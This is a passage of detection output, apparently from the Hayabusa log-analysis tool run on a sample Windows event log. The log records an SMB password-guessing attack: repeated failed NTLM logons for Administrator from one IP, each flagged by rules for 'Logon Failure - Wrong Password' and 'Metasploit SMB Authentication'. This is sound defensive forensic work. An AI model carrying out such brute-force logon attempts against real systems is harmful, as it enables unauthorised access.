SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.316 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OSO730O1fxDL4DfQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.316 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.352 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5wmniv339HLGKB4u : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.352 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.397 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rO3mxvgSES0lVN34 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.397 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.433 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: fvK9k9tnCq5hwBqe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.433 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.465 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ujFfMT6I6L8OHag9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.465 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.517 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FWKY2Wh21sePUR1L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.517 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.562 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6E6yf8D5cPOEwR0y : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.562 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.605 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OpFho8k52BkBlg4Y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.605 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.645 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ucDvfSfDYZzjNWFS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.645 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vnq3S0gEE98xfYLv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.688 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.724 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: seVfaEdAS6lEXgkG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.724 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.764 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Gz8BQAlyYXB61tx3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.764 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.805 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nkHLs6yikRWVjj9F : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.805 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.840 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 0bQUcnUBCmE81G6I : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.840 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.873 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BceDCcXoHJQv9pDi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.873 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.916 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GCCLt49g8wmAMEyV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.916 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.947 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pM6C8KRcxVIUsZrZ : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.947 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.984 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Fw5DU6l3QRVl9cWY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.984 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.016 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 37UthbuO3m4Lr7dU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.016 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: URB7Ji5pQleLtvy4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.056 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.101 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: orP9OgiBrYIKZPXE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.101 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.132 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZwvdnlIWhqoDg8On : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.132 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.181 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v6dXVbmLBpXc39ah : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.181 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.229 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 8Mu7amiHAg0l7bza : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.229 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.276 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JdG6F697kAXFDx9m : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.276 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.321 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jY5AAnfQMH3VZQUa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.321 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.357 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iVep4j7jZZAOAQAj : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.357 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.393 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KWWtGIQx8jBgAeoH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.393 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.427 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zn8X8gen8gX9i3QK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.427 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.476 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: B9OdUM99RBHzwgVs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.476 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.518 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TJbBVm6wDrqyQmpZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.518 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.564 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tAVRBfMxIyrfsEtR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.564 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.600 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wuCIClZihRxRyjGF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.600 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: yxhpEP6nnmihvkHB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.796 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.833 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: J1HYmJDrWmKjj8DF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.833 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.872 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V81dIfR2SRNDk3a2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.872 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.908 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vaZpLaxB1kcCXqHP : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.908 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.949 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JRhs8IoV6R6vyCdL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.949 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.988 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4wUYds3Ym3G2abrV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.988 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.016 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tmBfxm6pPLlSEsUI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.016 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VbAuqFggx0zz5iEn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.056 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.104 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8cytpVOjb4KrNaGg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.104 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.149 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BFFFt7eFzmlzbHhG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.149 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: AJQBZZiNKVGXzx4A : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.184 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.224 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7gyu6EyrtbyowTfC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.224 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.267 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aASpkRuPfE8Nl64n : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.267 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.306 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MSI2b7LpZpWO3xJW : IP Address: 192.168.198.149 : AuthPackage: 
